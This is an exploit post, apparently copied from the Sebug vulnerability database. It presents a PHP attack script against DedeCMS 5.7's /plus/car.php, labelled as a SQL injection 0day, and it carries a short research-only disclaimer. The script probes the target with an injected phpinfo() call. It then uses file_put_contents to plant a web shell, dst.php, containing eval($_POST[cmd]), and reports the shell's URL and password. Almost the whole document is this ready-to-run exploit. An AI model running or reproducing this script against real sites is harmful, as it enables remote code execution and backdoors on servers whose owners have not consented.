织梦(dedecms) 5.7 /plus/car.php sql注入0day

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

1. <?php
2. $host=$argv[1];
3. $path=$argv[2];
4. $path=$path."plus/car.php";
5. $url=$path;
6. if(count($argv)<3){
7. print_r('
8. Usage: php '.$argv[0].' host path
9. Example:
10. php '.$argv[0].' www.site.com /dede/
11. 作者：舞林 http://t.qq.com/wulinlw
12. 修改：小逸
13. ');
14. exit;
15. }
16. $data='$a=${@phpinfo()};';
17. $buffer = POST($host,80,$url,$data,30);
18. preg_match("/allow_url_fopen/i", $buffer, $arr_suc);
19.  
20. $str="allow_url_fopen";
21. if($arr_suc[0]==$str){
22. echo "Congratulations,target exist this bug. ";
23. $data='$a=${@file_put_contents("dst.php","<?php eval($_POST[cmd]); ?>")};';
24. $buffer = POST($host,80,$url,$data,30);
25. echo "shell:http://$host$argv[2]plus/dst.php,pass:cmd.";
26. }
27. else {
28. echo "Sorry,target may not exist this bug.";
29. exit;
30. }
31. function POST($host,$port,$path,$data,$timeout, $cookie='') {
32. $buffer='';
33. $fp = fsockopen($host,$port,$errno,$errstr,$timeout);
34. if(!$fp) die($host.'/'.$path.' : '.$errstr.$errno);
35. else {
36. fputs($fp, "POST $path HTTP/1.0 ");
37. fputs($fp, "Host: $host ");
38. fputs($fp, "Content-type: application/x-www-form-urlencoded ");
39. fputs($fp, "Content-length: ".strlen($data)." ");
40. fputs($fp, "Connection: close ");
41. fputs($fp, $data." ");
42.  
43. while(!feof($fp))
44. {
45. $buffer .= fgets($fp,4096);
46. }
47. fclose($fp);
48. }
49. return $buffer;
50. }
51. ?>
52. 摘自：http://sebug.net/vuldb/ssvid-60162